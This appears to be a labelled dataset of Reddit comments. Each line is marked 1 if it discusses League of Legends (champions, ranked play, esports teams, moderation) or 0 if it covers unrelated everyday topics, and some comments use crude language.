1	There will be a soft reset]( and we will have to play new placement matches.   Soft reset - everyone's MMR will shift towards the entry point of ranked. If your MMR is lower than the entry point you will gain MMR and if your MMR is higher than the entry point you will lose MMR.   Placement Matches - 10 matches (5 for ranked teams).   Placement - Decided by your MMR after your placement matches.   Note: Any movement on the ranked ladders during the preseason will remain when season 4 starts.
0	Also as a twenty something American, I'd like to point out  striking similarities with the 8Os pop scene.  In one way it's superficial as fuck that that leads to underground movements like The Butthole Surfers and Sonic Youth that were the precursors to Nirvana and the 9Os.  As much as I disdain the idea of hipsters, the apparently new interest in independent music does allow for musical innovation that eventually seeps into the mainstream.
1	Here's my opinion after watching LS's video. I respect LS a lot. The insight he has into the game is amazing. I like his coaching and the approach he takes when he coaches people (both in his stream to his viewers and what he's doing with SHC). I also completely understand his argument to justify XJ9's behavior. Everyone's been a teenager in their life and has made stupid decisions, I understand that.   Here's what I don't like, however. Why is XJ9 making a video about this? He seems to be explaining how XJ9 is definitely sorry about this. Why isn't XJ9 personally making a video publicly apologizing for his past actions, specifically to his old girlfriend? He's an adult now, as LS says, and the adult way to handle something like this is to do it yourself, not to hide behind a curtain and let someone like LS do this sort of video for you.   Finally, I feel like as long as LS is right about XJ9's situation at the moment, then this'll be very great for SHC. As long as XJ9 doesn't post nudes of Impaler for picking Lee Sin, then nothing will go wrong and SHC will continue to improve.
1	I would say lux. It's obvious that someone like alkali, zed, or any assassin can easily kill him in lane. But the reason Ziggs is such a problem is because of his ability to stall games with insane wave clear until he outscalesa. Ziggs late game team fight utility craps on any one assassin, there is no replacement for late game AOE. If you choose to play an assassin against him you better get fed, help other lanes and win early. If you chose lux however, you can shield your entire team in team fights negating some of his AOE. Also if you land a snare on him or someone else cc's him you can delete him or the adc with e and ult late game.
0	OP, I am a lawyer. It depends on your jurisdiction, but I would STRONGLY suggest speaking to a lawyer if you have not done so already.   Two years of no-contact is more than enough time to establish abandonment and have the parent's rights terminated. Also - if you don't already have some form of legal control over your nephew (like a guardianship) then you're going to be in major trouble if you are called to make some sort of legal decision for him (like major surgery, school issues, etc.) that requires legal authority to act for him.
1	If you really want to improve, you need to be able to play most role.   You shouldn't only practice one role, but if you really need to do it, play a champ that you can play top, mid, jungle or even support!   You want to be able to play champs that has ok/good early game, decent mid game and a really strong late game. That way, you just have to stall the game and just win because your champ is better than the other team.   But that kind of champion is really hard to find.
0	I never said they weren't similar. (In fact, I think Canadian culture on the whole is at risk right now due to increased international influence and we're slowly become just another collection of American states; helmed by poor leadership and political apathy by the general public.) What I said was that IF you were living in ONE LOCATION within the borders of Canada, you'd be generalizing to say the whole country is "very very  very  similar" to the US.   Whether that was my inference or your implication is up to debate, however I don't think that it is relevant to the validity of my statement.   Regardless, I do believe that any two places within the US and/or Canada will possess varying differences of culture, and that variation would fluctuate on a case to case basis.
1	In my opinion, Riot should simply put a difference between a banned account,and a banned player: For example they could have banned Linak's and Envision's account,permanently if required,okay. But EVERY other person then a pro player can just make another account,play,and correct or not correct is behaviour. Putting this in public is just a problem for the banned player AND his team. By the way,comments like : they should just not group up with such scumbags/cunts are wrong: there is a HUGE difference inbetween their behaviour in SoloQ and in a Team. ( I honestly hope so for the teams) Now,I know aAa better then mouz so I'll take this example: Why would Riot, First, Tell the world who they banned,Second,ban the person "Damien Lorthios" ,and not the account(s) from aAa Linak? As OP said,aAa has now to find a new jungler,because Riot didn't tell them that their player got banned for 1 year from the official SCENE,and not only the game? That is just a  bad method to keep toxic players away.
1	Whenever I watch TSM games I see chaox get caught of position and xpecial carry hard. I know your arguing about AD carry, but I think xpecial > Chauster simply, because i see xpecial do much more clutch moves then chauster. Also chausters blitz is god awful, and it may be because of this that i think chauster is worse.
0	It bothers me when other girls do this. It can totally ruin someones life. Sexual assault isn't a joke and it sure as hell shouldn't be a weapon for girls to use. It's a serious thing that has serious affects on someone and falsely accusing someone makes it harder for someone who actually was assaulted to find justice because people won't believe him/her.
1	Here are my thoughts as a 1600~ player.  She is trash and will not been in ranked anytime without major buffs.   Pros:   -She has decent mobility when chasing or escaping long distances.  However, her mobility is non existent for when it counts most, during team fights.  See the first point of the cons.   -Decent AOE damage during team fights.  I haven't done the math, nor am I a top player or theorycrafter, but with her ultimate, she does gain huge range for those team fights that are very packed together.   -Huge damage potential as a snowball champ.   -Also, this is stated in the tips section of the character info, but I'm going to repeat that Riven is decent against multiple melee characters targeting you.   edit   -I rarely ever play TT, but if she could dash through thin walls, she would be godly on TT.  TT's metagame usually involves 3 tanky DPS, or at least 2 tanky DPS, and Riven excels at dealing AOE melee damage.   Cons:   -For a character that is supposed to have high mobility, the distance of the E dash is pathetically short, like Nidalee's W.  This grants her piss poor mobility in team fights.  It doesn't let you traverse thin walls unlike Nid.   Although Q grants forward movement, Riven has no gap closer, thus she is not considered an "assassin" by Riot.   If you were to use Q to close the distance on your desired target, you are wasting your damage if you leveled Q.  If you level W for damage, then I can see Riven using Q and E to close the gap, but after her short 0.5 second stun, I don't really see her being able to use 3 stacks unless your enemy is directly fighting you.  If you are chasing someone, good luck with that.   -Incredibly high skill cap required to play well.  The "stutter step" micro required of her is going to be very difficult for average players.  Also, during team fights, if you are intending to stick on a specific target, as you usually should, it's  too hard to stutter step properly and always be attacking your desired target.   Because of this, she will get kited severely just like Udyr and Nasus.   -No disables aside from her W. Her W stun range is piss poor without her ultimate active.  This is related to what I feel is her main problem with mobility.  If the stun radius was to be extended too greatly, it would be overpowered.  As it currently stands right now, she lacks the move speed and mobility to get into a good position to AOE stun, so if you're chasing the enemy, you'll usually only stun one :[     No good abilities that help you sustain in lane nor farm even.  Riven has no ranged aside from her ultimate.  Farming early game against a good harassing champ will cause you to be denied to hell.     She can not initiate fights aside from a short distance.       Other thoughts:   I keep wondering if she designed by the guy who made Garen, for multiple reasons.   Riven seems like a snowball champ like Garen or Akali, but seems mediocre without any advantage.   If you play like Garen does, camping the brush as top solo for a chance to harass the enemy down with your combo, such as in the champion spotlight, possible seems like a viable method to lane.   I can't seem to think of a role that couldn't be filled better by multiple other champions.  She doesn't have any abilties that are truly unique to her aside from doing massive aoe melee damage, which is what garen does also.  Garen is 100x easier to play, does more damage, and has more survivability also.
1	I played with a morde who went 0-4 in lane against morgana and told us the game was over from the start because we banned shen instead of morg [lol]   Meanwhile I was playing vayne in botlane and had about 4 times the enemy ashe's cs..when laning phase ended around 22 mins I had 200 and she had 60 and I was 3/0 .............as vayne.   Mordekaiser decides to afk for 20 minutes then come back as we are finishing baron and pushing down their nexus to ask the other team to report me for being a noob.
0	I disagree.  How many addicts do you know personally?   Has addiction touched your life?  It is easier to write people off as weak and subhuman than to put yourself in their place and have empathy.   I came from nothing.   My dad is an alcoholic,  my family is poor.  I put myself through college.   I have a good life now, a good job.  But I know that things could have gone differently for me.   My life could have gone in a different direction.  I can drink in moderation.  For that gift I am so grateful.   As messed up as my home life was it's a cake walk compared to what others have to go through.   You can judge those people and dismiss them.  I think it's better to see their worth as people and find ways to lift them up, get them to a better place.   A healthy person is more likely to contribute to society.
1	Fiora Tweaks/Rework   So me and my friend theory craft possible champion reworks.   The one wich I enjoyed discussion the most was on Fiora.   We think that her passive is what is truly wrong with her. Maybe to some of you may come as a surprise that Fiora as passive. I know right? I was shocked too. Although it is not THE WORSE passive (hi Kog/Zyra) it just feels underwhelming and it feels too underpowered. Health regen? Really? Her name is "The Grand Duelist" and she gets health regen?   What we think her passive should be?  Something along these lines (subjected to proper tweaks of corse)  Every time you get hit you gain a Riposte Stack (they decay over time). When you have seven Riposte Stacks the next basic atack you get hit, returns full damage/200% damage to the adversary (if 200 maybe the 7th stack decays faster)   Now that we have finished looking at the passive lets look at Q.  We think Q is in a good place  If anything with the tweaks to passive Q may need a slight dmg nerf, but rather wait and see if she does.   So with the changes we propose W looses active - for active we want have a few ideas  - First off it is an auto atack reset that marks the enemy. This mark allows Fiora to do extra damage with each basic atack do the enemy to a period of 2 seconds. This is the one we enjoy the most since it will solidify her role as a duelist. Second idea is a  Reverted fling  I actually really like that, it makes her feel like a Zorro, while allowing her some mobility. What this makes is frienfly stuns target, kinda like Quinn's E, and during that stun you jump over the enemy. If the enemy is near a wall you actually do a flip over the wall. Third is sort of a "disarm" active which allows us to "blind" the enemy. Most of us don't like this idea cuz we think blind is a bad mechanic.   Fiora's E might need some number tweak in case her current kit shows to be too strong, but overall we would like to keep it that way.   Fiora's ulti we think is in a good place. I would actually find really funny if her ulti released her of all cc andafter the ulti ends she still gets the cc. Example: Taric stuns her. She will be stunned for another 1.5 seconds but she uses ulti. her ulti activates as normal, but when she is done she still is stunned for 1.5 seconds.   Please give feedback!!!
1	You guys don't understand. The small amount of people that are mad about this don't even compare to the hundreds of thousands of shitty players that will feel better because of this. Riot is catering to shit players. This shouldn't be surprising. The new elo system is designed to make people feel good even though it's a total facade.
1	Yup the other guys that posted before me have it right. Winning your lane and having high cs is only part of ranked. The whole point of solo queue is showing that even with a bad team, you can still carry them to victory. So as a top laner you not only need to win lane, you also need to impact the other lanes so that they can get ahead. That's on reason that taking ignite is usually not great on a top laner. Yea you will have a better laning phase, but you essentially cut yourself off from the rest of the team for the entire laning phase. It also leaves you very open to split pushes.
1	also of note regarding challenger tier: quantic gaming has 5 accounts in the top 10, including the top two spots.
0	Not even joking. This happened to me last year.  I was just getting back to my place with my gf at the time.  I'm on the first floor of the apartment complex so I walk in through my patio door. Then, I notice some light coming from the kitchen and I notice that my front door is cracked open.  after searching the rooms with a giant knife in hand and checking to see what was missing, I found that everything was exactly how I left it.  Not one thing seemed to be moved or touched.  I called the police and they sent a few cops over.  I felt silly because nothing had been stolen, but I wasn't feeling very safe and didn't really know what else to do.  Once they come over and ask us some questions, we find out that my gf, when she had gotten the pizza we had for dinner from the pizza guy, didn't deadbolt the door but only turned the knob lock.  The police gave her a hard time about this because it appeared that the intruders had simply stuck a crowbar or something similar in the door and pryed it open.  In conclusion, lock your deadbolts, iPads are scumbag Christians and autocorrect pryed to prayed, and fuck raccoons.
1	I DUNNO GUYS BUT I'D JUST LIKE TO SAY that I've played over 1500 games of LoL and I haven't had a single leave.   GUIDE TO NOT LEAVING   Note: this is what I do.     Make sure you have TIME to play League of Legends   Make sure your INTERNET IS STABLE before playing League of Legends by doing a speedtest   Make sure your POWER IS STABLE before playing LoL, and there are no storms or such that would affect my connection   Make sure your COMPUTER WILL NOT CRASH by checking what programs you have open, as well as your processes    Make sure that there is no LOGIN QUEUE in the case that LoL crashes   Make sure that you are PHYSICALLY ABLE to play League of Legends without stopping for at least an hour and a half   Make sure that you have NO PRIOR ARRANGEMENTS in the next 1.5 hours     That means:   Stormy outside? Don't play.   Little brother fucking around with Youtube? Tell him to stop or don't play.   Dinner at 6 and it's 5? Don't eat or don't play.   Class in an hour? Don't play.   Share connection in a dorm and retards torrenting? Don't play until early morning when nobody is using the internet.   Computer overheats? Don't play until clean out computer or find out why it's overheating.   Call from friends/girlfriend/parents/grandparents? Don't pick up until you finish game, or wait to text/call them when you are respawning telling them you're really busy   Remember: You can't disconnect or leave from a game if you don't start a game. Possibility that you may have to leave a game? Don't play.   California V C Section 22350 Basic Speed Law: No person shall drive a vehicle upon a highway at a speed greater than is reasonable or prudent having due regard for weather, visibility, the traffic on, and the surface and width of, the highway, and in no event at a speed which endangers the safety of persons or property.
0	My post might be a bit blunt, but I could only write so much in the form of a meme.  The idea I'm trying to get across (and apparently I wasn't doing so hot) is that if a person is stupid enough to allow their child to DIE rather than swallow their pride and seek medical help, there's probably many, many things wrong with them besides that one mistake.
1	If you see 1v5 fight and he is guaranteed kill for enemy... for god sakes don't go to save him and then die with him. Well you get the point.
1	ABRIDGED QUOTE FROM THE SITE)   ALL of the flash arrows on the [original image]( can be accomplished using the current flash, except two:     The arrow going down into baron pit. To accomplish this you have to flash diagonally.   The arrow going up from the brush towards mid tower. Again, if you flash diagonally you can also fix this.     After tons of experimentation, here's what I came up with for the new flash: [NEW DIAGRAM!](   All the lines I've drawn are what I deem the "difficult" places where you can flash over. There are a lot more obvious places that I haven't put here that I thought were obvious or trivial, including many of the arrows on the picture you posted. There are also definitely some "difficult" lines I haven't drawn - if you find some crazy ones, let me know!   I tried to maximize the distance you travel in each location, unless for some reason it seems stupid that anyone would want to be flashing in that direction. However, I'm sure many of these aren't perfectly optimal. They're also not pixel perfect, but should be mostly accurate. If you can't seem to carry one out, feel free to message me and I will try give you suggestions. Also, if you want to suggest another spot, or just have questions in general, you may message me as well.   Hope this helps!   **
1	Tell me if im out of order but if I would also be unhappy with having to share the prize money with the benched players, after all they actually did nothing, they sat on the bench. If they had played some of the matches (correct me if they did) then I would be all for sharing, on the other hand if they didn't that would be free money for doing literally nothing. Them getting no money from world's should motivate them to be the best and try to be better than their original on the team so they get number 1 place, not give them free money so they think they can just be benched and still reep the reward of what the other FIVE players did, the original five won that money, not the benched players.
1	This isn't intended. If you duo with someone lower than you, u should get enemys with lower MMR, which means you should get less LP.   People are getting weird LP right now, like 3 LP per win 20 Lp- per loss.   But Riot is investigating.
1	I started playing ranked a few months after I hit 30. I was always scared of ranked because it felt like if I got a bad score it was permanently there to remind me/show everyone else that I did bad, so I spent a lot of time after 30 just playing normals with friends trying to improve my play.   My aim was to practice my mechanics in normals, as well as play a single role with a few select champions to get really good at them. If I remember correctly this was around mid-season 2, and I really wanted to master nidalee top because she just appealed to me for some reason. After spending a good couple months playing as much nidalee as I could, I decided I would play ranked because I felt confident in my ability to beat my lane opponent.   When I had completed my placement matches I think I evened out at 1200~ elo, and I was happy with hitting silver. I had some good win streaks and some horrible losing streaks in season 2, with my elo floating between 900-1300~.   Season 3 arrived and I immediately got asked to duo with a friend of mine because we felt we were at a similar skill level to each other, but both of us didn't take into account changes to items etc that happened at the start of the season, so we were using outdated builds and it felt like my knowledge of the game had regressed. I went back to normals for a long time after this (4-5 months).   I picked ranked back up a couple months ago and had some good win streaks with my old favourite nidalee after learning what she could do with frozen fist. I got placed in silver V at the start of S3 and I am now silver II and climbing.   My advice to you (if you read this far lol), is to make sure you feel absolutely ready to play, if you put yourself in a bad mood before ranked you will most likely under-perform and not want to play again. Also, you might argue that you could infinitely practice in normals and then just go into ranked and stomp, but I would suggest just playing until you have confidence, and then use ranked as another learning platform.
1	So I went into depth on the Perfect Ascension icon a little bit here if you're interested.
0	Yep, I usually never yell during debates.   I'm usually very rational and instead of yelling at someone and say "YOU ARE STUPID, ASSHOLE!" I usually explain why what they said was stupid.  This aggravates people. It also often causes an insane amount of dissonance. However, there usually is no countermeasure against unreasonable behaviour. Some people just don't give a shit about reason.   My ex-girlfriend was very emotional in debates while I was always taught to be stoic. What I can tell you without a doubt: Not yelling/not being emotional might destroy a non-emotional person  very quickly . For many people it's actually necessary. I don't care, I won't stop being reasonable and start catering to irrational behaviour just because someone can't cope with reality... and I had all the arguments on my side and it's her problem for being an unreasonable, emotional bitch.   Now I'm in a relationship with a lawyer that also studied electrical engineering. You can't imagine how much more pleasant and efficient conversations are. You can't imagine how amazing it is to ask "Why?" and actually get a falsifiable explanation.   There nearly are no problems... because they get solved. Quickly and responsibly. The only cause of conflict is personal taste. All of such problem ever encountered so far were solved by alternating between getting what she wants and the next time getting what I want.  Unfortunately I think reasonable people are very rare in our society.
1	Janna was Victorious not Championship, and seeing as Jarvin (melee bruiser) has Victorious and Riven (melee bruiser) has Championship, I don't think this is relevant.
1	I love how there used to be this huge debacle over twitch vs own3d which is better when like in a year it's absolutely obvious which one is better and adds more features on a constant basis. Own3d chat doesn't even work half the time, those dumb people who kept siding with own3d I never understood because the community could clearly see which website was releasing more features. Anyone stroll have trouble scrubbing through own3d VODs? Oh yeah, everyone does. Jesus they've been around for so long and they still haven't fixed basic things (only 1 even has a smartphone app right now, I know you can stream from the website of own3d but come on! It's impossible to navigate on such a small screen!!)
1	All of CLG are top level players, none of them is a 'problem'. The issue with HotshotGG's champion pool has to do with their team strat and his playstyle, rather than his skill as a player. The '2 threat' vs '3 threat' debate is a red herring and has nothing to do with why they have been useless in S3.   The reason CLG is losing in S3 is because they have almost no concept of strategy. By the end of S2 various teams and players finally began to understand Summoner's Rift, and slowly began to develop REAL strategy and map concepts. CLG always had certain understandings about split pushing and alternating lane pushing, and while this is the equivalent to kindergarten level map understanding, it was still greater than the zero understanding every other team in S1 and S2 had. Now that Asian teams, as well as Gambit and Fnatic and a few others, have developed some global tactics and awareness of how to distribute team resources around the map in a fluid and dedicated fashion, CLG's one minor area of map concepts has become obsolete and immature compared to the far more sophisticated understanding other teams have.   CLG has no theorist worth anything on hand, and no one to teach them how to advance in strategic planning and understanding. It is no longer good enough in LOL to be a great player and to know how to put together a team comp; the teams now must have advanced level game plans in order to compete seriously. "Farm well and try to get kills from ganks" is a totally insufficient plan; it is the equivalent of "do well", which is nonsense. Small stuff like 2v1 lane swaps and early tower kills in the 2v1 lane is very basic stuff and only lasts 4-6 minutes. After that these teams don't know what to do, unlike Asian teams and some EU teams that know exactly what to do in every part of the game. NA's biggest problem across the board is that teams don't have tactical instructors explaining to them how to play the map. CLG is probably more stubborn than most teams in altering the way they've played for years, but they are not the only team suffering from this.
0	I think it is important for children to understand that money is a concern for everyone, what is key is that you discuss money in a constructive way, regardless of whether your children are in the room.  If you set an example of how to hold a productive discussion about complex topics, it will show them an example.  If you show them how it is possible to budget, they get a sense of the value of money.
1	I used to have a similar problem a couple weeks ago. Every 10 minutes or so I would get the dreaded "Attempting to reconnect" banner and be unable to control my champion. All while I could see everything happening around me. Usually it would last about 10 seconds, but sometimes longer and it would actually disconnect me and put me back in base.   For me it was a problem with my internet connection. Even after restarting everything, testing two different routers, and directly connecting my computer to the modem itself, I still had this problem. I would also disconnect while watching streams and netflix. When I ran windows networking troubleshooter during the disconnects, it would sometimes say no problems found, but other times say it couldn't connect to the DNS Server. Called my ISP (Comcast) a few times, and they didn't really know what was wrong. Finally one guy mentioned it might be a problem with the modem. At the time I was renting a Motorola SURFboard SB5101U, so I figured I would just buy my own anyways. Got a Motorola SURFboard SB6121 DOCSIS 3.0 CPE and after setting it up with my ISP, no more problems have arisen.
1	I hereby admit to downvoting this thread on the regard of "s*** sense, son".   Imho ARAM is about fun, and surrendering just means you're playing to win (and once you fail to do so, want to surrender), not to have fun. If that's the case, ARAM is not the mode you should be playing - actually, they should just remove surrender FROM aram..
0	Ok, funny story.   I'm out getting dinner with my gf's dad and her brother (I live with her and her family at the moment). It's a pretty awful mexican restaurant, but it's hard to fuck that up, so we enjoy our food. Her dad being the guys he is, decides he wants the cardboard cutout of the Dos Equis guy, just like this one. Well he does his best to sweet talk the manager and she lets us take it.   Now, here's where it gets funny. My gf was hanging out with her cousins that night. Her dad and bro thought it would be funny to hide the cutout in her room so that when all 5 of them went up there they would all get scared. Well, they didn't all go up there. Only my gf went up there by herself after they had left. In complete darkness. She sees a 6 foot silhouette of something, freaks out, and runs like a bat out of hell. She is wearing a long dress that night, which she trips over at the top of the stairs. She tumbles down the stairs, glorious tits hanging out for all the family to see, and bruises her ass on the way down, as well as her ego. She was very upset. I was very upset. Now it's just hilarious.
0	I'm late for the party but I want to rant anyways...   You don't have a 1080P HD Video Camera... sure, you don't have a Digital SLR...sure. But, WHO DOESN'T HAVE A CAMERA? I don't care if the image is shitty, that's way better than no image. Not only does this hurt the seller, but it's hurting the buyers. (A.K.A. Me and you)   When I'm on Craigslist I'll only look at postings with pictures. Sometimes I feel like I'm missing out, I could be getting a way better deal... but it's just not worth the risk of driving somewhere to only find out whatever I was buying is complete shit and should never have even been considered.
1	I personally thought your post was pretty informative, but I disagree with your opinion on annie.  Her AP ratio's are terrible.  The only way you can really capitalize on them is if you get mejai's because she can rack up kills pretty easily due to her fantastic mid game. Late game she peters off hard and mainly benefits from magic pen due to the high base damage on her combo.   Usually Annie's do actually build pretty tanky/supporty.  I see a lot of Annie's get Will of the Ancients/rylai's to provide more utility to the team.  Sure she could build straight AP, but her entire spell combo only scales 1.9 off AP (including her ulti).  Compare that to veigar who's spell combo scales 2.8 off AP.   Although someone like veigar pretty much does always build straight ap, with very little emphasis on support.
1	Let's not forget about the fact that the enemy team will have norm runes, giving them a HUGE advantage early game. The xp bonus won't do much for you until mid game, as even then  you have a small window of opportunity there. Really not a good idea IMO. You sacrifice too much, ESPECIALLY depending on position and the quints you normally use, for example a jungle with Move speed quints or life steal quints; something you DON'T get by leveling up, will just give them a disadvantage.
0	I didn't post that link because I thought the post was, "cool," or whatever the fuck you think I posted it for. I posted it because of the comments. There is much whining and gnashing of teeth that someone would DARE question the integrity of white people. There's a thousand comments along the lines of, "oh, I guess if I'm white, I can't complain." Whine whine whine.   Now look at the comments from this post, there's plenty of, "oh c'mon, it's just Advice Animals, you can't take it seriously," or, "bitches totally don't want to work as hard as men. Word, brah!" The hypocrisy in the comments is the point, not the post.
1	I'm not treating Froggen like he's not human but at the same time, its perfectly plausible for a players to expect a pro player to play with a better attitude then ragers and flamers at low elo's.   I'm not gonna pretend I don't rage but I mostly do it out loud and never convey that in typing. I never go out of my way to insult someone in such a manner in the in-game chat. As a professional player, he should know that that accomplishes nothing.   If he's a pro, he should act like it. If he's under pressure, maybe take a break?   The difference between him and ragers/flamers on Reddit is that no one cares about the latter. The majority aren't high elo or pros, or have successful streams. Their are different standards. A pro has to expect that the anonymity of the internet will result in assholes insulting them or raging at them for some stupid reason. However, a pro player can't do the same unless they want to show the world that they really have the brain of a 12 year old but are extremely skilled.   Perhaps he shouldn't stream while he's sleep deprived? Perhaps he should call it a day if he's on a losing streak? Perhaps he should pay more attention to what's being picked instead of bitching about it?
0	My friend, who is also my arch nemesis on SSB64, did this to me in game 7 of our best of 7 series as I was spiking his stupid, purple jumpsuit, Fox ass down.  Jimmies were rustled.
0	Nobody should be required to go to these events. But I can tell you if I have an employee that shows a patter of just getting the minimum done I know who I'm going to use development hours on and who I'm not.   If you just want to do the minimum, you send a clear message to management that you're just a body who's content to be a little cog and not worth wasting training time on.   We are social animals, and business usually work more efficiently if employees can connect and communicate more effectively. Events like this help interactions for most employees. If you don't want to participate in that process, you are welcome to do so. But don't complain about your dead-end job or how Steve got a promotion ahead of you because he 'brown-nosed' his way to the top.
1	His build wtill stay pretty much the same,he can still Q and E and get out,just because his riftwalk has 3 seconds cd doesnt mean we have to build cdr now,its 2 secs less,enjoy it.   His role is exactly the same,counter ap's mid,he will still be able to R in, Q>E and go out with his shield easy,and riftwalk is ready by then.   Nothing is changed,theres just a bit more counterplay to him since he no longer silences u,but he plays exactly the same,and still very strong  overall.
0	I did this in AP english, and all through college. I'm an English major, but that doesn't mean I can find all the sources easily. Also the Wikipedia sources are a good place to start. I can write a 5 page paper in less than an hour and always get an A using this to source.   Also never EVER forget the 5 part paper. Works every time even of you make each section a page or two.   Source: college student for over a decade. Maybe someday I'll grow up and get my degree so I can start paying on my frightening student loans.
0	I don't do shit, just stay sit all day because I bulged a disc and I'm too afraid to do anything serious. I'm for a year like this and my body is now more lean and less "artifical" bulked ( you know a fat strong fella anywhere ).   So your theory sucks, at least for me lol.. If I find a girl that takes care of the body as much as I do I would be fucked lol.. However I already met some girls that DONT DO SHIT and are TOO HOT (all of them less than 24 years lol) Hell, even my GF doesn't do anything right now, just works and she is quite hot compared to a normal girl..
1	So I'm just going off of the quoted text here (since I will assume you quoted all relevant text?).   The first issue, Lyte and Ymir. Lyte says the application of restrictions isn't automated, and no where in Ymir's text is that contradicted. You seem to have an issue with Ymir's wording and have assumed that he meant the system was automated. Nothing is perfect, no system, no human, and they agreed with that, but nowhere is it stated by Ymir that the system is automated. Way to jump the gun on that... Maybe you assumed the entire system was human controlled or something? Most likely the information gathering is controlled by a program, which makes sense (there are a lot of players).   Ymir's acknowledgement as to room for abuse, you are making assumptions again, you jump to the conclusion that this means the system is completely automated. The "room for abuse" could simply be doing stuff in League that baits another player into breaking the summoner's code (which is an abuse in the Tribunal system as well).   Your example with you and your friend is useless unless you can provide the relevant chat logs, otherwise we'd have to just take your word on it... Which I doubt anyone is inclined to do since we have no idea how you two acted.   > Seems legit. If you're banned enough relative to the number of games you play your account is flagged and most likely automatically chat banned.   Again with the ASSUMPTION of automatic application of the restriction. No where did it say that but you ASSUMED it so.   Pre-game and post game chat logs ARE available to them, even shit you say in chat rooms. I don't know why you find this hard to believe as all that info goes through Riot's servers. Just because the "community" thinks something, doesn't make them right does it.   As for the random timings of handing out of the restrictions, they can easily just tell a program to hand out X restriction to whatever player and have it do that whenever they tell it to, so the time it happens isn't evidence of any dodgy dealings. Maybe it's set to hand out the restrictions weekly/monthly/whateverly and Riot employees just add the names to that list. You just don't know, but yet you assume.
0	Yeah and all of the people who worked at those stores basicaly were welcomed to hell.
1	It is a different game, but that might not be a bad thing. My experience with first time league games is that a lot of players bring heal, exhaust, ghost or whatever and then never use either summoner the entire game. Many people can't even consistently do their spell rotations in a fight and might die without ulting. Seeing as this is the case, I'm OK with flash ignite not being available immediately, as those will probably only be used by smurfs anyway. Heal and ghost are like the easier versions of ignite and flash.
1	I'd say, champ select and bans are half the fun. If you get decent players(at higher rating) that want to work as a unit, you can discuss picks and bans, pick a team comp with synergy and make up tactics.   But the downside is in silver, is that most people are bad and dont care, they just wanna play, they dont see it as a 5v5 game.   But its just what it is.   >as a side note can stats from normals effect ranked matchups and since my leauge position is most lickly going to decay further what happens with my matchups?   no, normal got normal MMR, ranked got ranked MMR, both decay if not being played.   >
1	Ninjaken can you please give me an advise with nocturne, i've been loving him since season 3 and now that he is viable in S4 again i started playing him like crazy but i got a problem with ganking most adc's. I try my best to like go Fear and in front of em so they go towards our tower but then they just flash or just use escape ability to go again in front of me and these supports make it even harder.
1	In terms of learning ADC on a higher level, I'd say tristana is one of the best champs to do it with. Went from silver 1 to plat 1 pretty much exclusively with her. She trades very well, is very forgiving in terms of being able to get out of sticky situations with her jump and ult, and by playing her, you begin to see the mechanics of what makes an adc.   Past lane phase, her damage is pretty much entirely autohits. This lets you practice simply autohitting on a high level, like firing a shot and moving immediately to cancel the rest of the animation, or using the A-move feature to fire quickly on the run without having to worry about actually clicking on the enemy. End of the day, with enough Tristana, you learn what makes an ADC: Positioning and autohitting. The number one reason that Tristana wins games is her ability to do those two things absurdly well late game. Her w lets her jump around to reposition after every kill/assist, her passive range increase keeps her at a safe autohitting distance, and her ult lets her peel for herself, giving her all the tools to autohit and position at will. Not to mention a 90% attack speed steroid to help out those autohits.
1	It's you guys MMR That can't give you a higher rank Imo, I got ranked Gold 5 with my team we are Silver/silver/gold We faced 6th times 2 plats/1 gold we won and got gold 3 without doing series and our win ration is 8/9.
0	All anyone wants is to be treated like everyone else.  I live in a town that is probably 95% white and when someone comes up and introduces them self and say "Hey Brother Man" or try to give me a soul brother hand shake I don't think they are racist, it's just annoying.  It rarely happens anymore, once one of the fathers on one of my sons teams introduced me to someone as his "Black Friend".  He immediately apologized and realized it made him look like a fool.  In all of these situations I don't think racism was the motive, I think it was simply they really had never been exposed to many black people.
0	As someone with a DUI on his record, I wish to say, "FUCK YOU!!"...   But you don't really deserve that. There's no telling if you did the right thing or not, but in my opinion, you did the right thing. Sometimes people only learn by going through an ordeal, as opposed to being told about it. I got my DUI when I was essentially sober (0.021 BAC but I was underage and the limit is 0.020). Had I not gotten a DUI and had it not hurt me so much financially, I probably would have continued drinking and driving until I got caught or hurt someone. Thankfully that never happened. Now three years later, I really put thought into my nights  out. Many people fail to realize that a $20 or even $50 cab ride is infinitely cheaper than getting a DUI.
1	First video I watched of yours was about Ashe and her underrated viability in solo queue. Second was a Nunu tutorial where I learned to use my ult in the bush. You taught me something useful about the game and for that you gained my respect and attention.
1	Some thoughts about game changes from a Silver 5 support main:   Biggest change in that time was the jungle.  New jungle hurts a lot so you will probably go back soon after first few camps. The changes are big enough that you would probably be wise to invest a little time into watching a VOD or two (I recommend foxdrop). Short summary: upgrade machete early, smite the raptors once you don't need other buffs to survive, river crabs are amazing, and dragon rewards a buff instead of pure gold; this buff is important to secure early because getting 5x dragon buff is about the only way low elo players know how to finish a game.   Lee can thrive in the new jungle, and his early dueling damage combined with damage of the jungle creeps themselves can make for some scary counter-jungling.  J4 has been a go-to jungler for a few patches, and if you intend to jungle you should probably learn the beautiful disaster that is Nidalee jungle.   Mid: I don't really play mid but DFG is gone and I know that makes mid sad. Assassins in general seem to be struggling. Mana regen also got nerfed so resource-less champs came in to favor.   Top: still an island. Gnar release made sure every in-meta top laner could deal with his nonsense. Ryze nerf took him out of common play, but most of the other big players are still around.   ADC: Graves's rise to power was completed by the Kalista release since he can deal with her and hasn't been nerfed yet.  With the return of short range adcs, Sivir can survive lane again so she is seeing a lot of play.   Support: Games are lasting longer and ADCs are more relevent so peel and protect are seeing a lot of emphasis. May the reign of Janna be long and prosperous. Tanky supports feel mediocre at best, so Blitcrank is doing lots of fisting.
1	not much to discuss really, Gambit with a sub looked uncoordinated ... the team fights reminded me of solo queue and if that wasnt enough Alex and Diamond got cought few times.
1	This feature has already been suggested, along with other favorites like including post/pre chat logs. It isn't a matter of Riot not liking them, but it is a matter of time and resources. These things while nice, will do little to improve the current Tribunal's effectiveness.   Once again however Lyte has mentioned it is on the team's list for things to accomplish within the future (versus a wip with no slated projection of time), but ultimately it is not something the team is heavily pushing for as of right now.
0	What's really fun is JUICING a beet! I had no idea how... incredibly potent, their natural color is.
1	One NA team has only one player from Hawaii or something.   One EU team played half their games without their jungler and still managed to beat TSM.   Fnatic lost the possibly closest match ever due to a possible bug.   If alliance didn't throw vs Kabum and SK didn't receive a ban there would have maybe been no NA team advancing out of groups.   Sorry, i really fail to see how NA > EU.   All that is confirmed so far is that NA got lucky and KR is still the best region out there.   This whole NA > EU or EU > NA thing is SO STUPID. No matter which team just won. Tomorrow ALL could beat C9 in a friendly and everyone would go EU > NA? Cmon it's silly.
